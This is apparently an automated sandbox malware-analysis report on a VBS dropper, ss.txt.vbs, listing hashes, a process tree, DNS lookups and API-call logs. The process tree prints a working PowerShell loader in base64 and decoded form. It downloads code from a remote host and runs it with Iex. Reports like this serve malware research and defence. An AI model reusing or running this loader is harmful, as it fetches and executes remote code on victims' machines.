Summary | ZeroBOX

ss.txt.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 10, 2023, 9:55 a.m. Aug. 10, 2023, 9:57 a.m.
Size 1.4KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 d7e90b3e0face4bb9956ab6cd048a102
SHA256 6652bde562ae81a5706fc1d857be5d3e0b08494f1c37f1e1cf70ecf153517930
CRC32 532985F2
ssdeep 24:9AYARCwHatOfm8MwnmV7RcvdAHLVT3BtwlimO9Yg21uYEBMEN5G8m4odr8t8E81t:eYARCw6timoniVOdOLVT3BtkiB2MMENM
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ss.txt.vbs

    2556
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $tpnscjliodahrzugwmef = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpsb2Fkd2l0aFBhcnRpYWxOYW1lKCdNaWNyb3NvZnQuVmlzdWFsQmFzaWMnKSA7ICR2YXIgPSAgW01pY3Jvc29mdC5WaXN1YWxCYXNpYy5JbnRlcmFjdGlvbl06OkNhbGxieW5hbWUoKE5ldy1vYmplY3QgbmV0LndlYmNsaWVudCApICwgJ0Rvd25sb2FkU3RyaW5nJyAsIFtNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ2FsbFR5cGVdOjpNZXRob2QsICdodHRwczovL3RyYW5zY2VuZGdyb3VwLmNvL3NzLnBuZycgKSB8IElleCA7IFtieXRlW11d'));powershell $tpnscjliodahrzugwmef

      2632
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var = [Microsoft.VisualBasic.Interaction]::Callbyname((New-object net.webclient ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://transcendgroup.co/ss.png' ) | Iex ; [byte[]]"

        2768

Name Response Post-Analysis Lookup
transcendgroup.co 200.225.42.150
IP Address Status Action
164.124.101.2 Active Moloch
200.225.42.150 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: GAC Version Location
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: True v2.0.50727 C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0...
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: Exception calling "CallByName" with "4" argument(s): "The underlying connection
console_handle: 0x00000037
1 1 0

WriteConsoleW

buffer: was closed: An unexpected error occurred on a send."
console_handle: 0x00000043
1 1 0

WriteConsoleW

buffer: At line:1 char:126
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: + [Reflection.Assembly]::loadwithPartialName('Microsoft.VisualBasic') ; $var =
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: [Microsoft.VisualBasic.Interaction]::Callbyname <<<< ((New-object net.webclien
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: t ) , 'DownloadString' , [Microsoft.VisualBasic.CallType]::Method, 'https://tra
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: nscendgroup.co/ss.png' ) | Iex ; [byte[]]
console_handle: 0x0000007f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000008b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: Module : CommonLanguageRuntimeLibrary
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: Assembly : mscorlib, Version=2.0.0.0, Culture=neutral, Public
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: KeyToken=b77a5c561934e089
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: TypeHandle : System.RuntimeTypeHandle
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: DeclaringMethod :
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: BaseType : System.Array
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: UnderlyingSystemType : System.Byte[]
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: FullName : System.Byte[]
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: AssemblyQualifiedName : System.Byte[], mscorlib, Version=2.0.0.0, Culture=
console_handle: 0x000000cf
1 1 0

WriteConsoleW

buffer: neutral, PublicKeyToken=b77a5c561934e089
console_handle: 0x000000d3
1 1 0

WriteConsoleW

buffer: Namespace : System
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: GUID : 00000000-0000-0000-0000-000000000000
console_handle: 0x000000db
1 1 0

WriteConsoleW

buffer: GenericParameterAttributes :
console_handle: 0x000000df
1 1 0

WriteConsoleW

buffer: IsGenericTypeDefinition : False
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: IsGenericParameter : False
console_handle: 0x000000e7
1 1 0

WriteConsoleW

buffer: GenericParameterPosition :
console_handle: 0x000000eb
1 1 0

WriteConsoleW

buffer: IsGenericType : False
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ContainsGenericParameters : False
console_handle: 0x000000f3
1 1 0

WriteConsoleW

buffer: StructLayoutAttribute :
console_handle: 0x000000f7
1 1 0

WriteConsoleW

buffer: Name : Byte[]
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: MemberType : TypeInfo
console_handle: 0x000000ff
1 1 0

WriteConsoleW

buffer: DeclaringType :
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: ReflectedType :
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: MetadataToken : 33554432
console_handle: 0x0000010b
1 1 0

WriteConsoleW

buffer: TypeInitializer :
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: IsNested : False
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: Attributes : AutoLayout, AnsiClass, Class, Public, Sealed, Seri
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: alizable
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: IsVisible : True
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: IsNotPublic : False
console_handle: 0x00000123
1 1 0

WriteConsoleW

buffer: IsPublic : True
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: IsNestedPublic : False
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: IsNestedPrivate : False
console_handle: 0x0000012f
1 1 0

WriteConsoleW

buffer: IsNestedFamily : False
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: IsNestedAssembly : False
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: IsNestedFamANDAssem : False
console_handle: 0x0000013b
1 1 0

WriteConsoleW

buffer: IsNestedFamORAssem : False
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: IsAutoLayout : True
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: IsLayoutSequential : False
console_handle: 0x00000147
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00639c40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00639c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00639c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00639c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00639800
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a540
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a480
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0063a480
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654ac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655880
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00655780
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72561000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72562000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
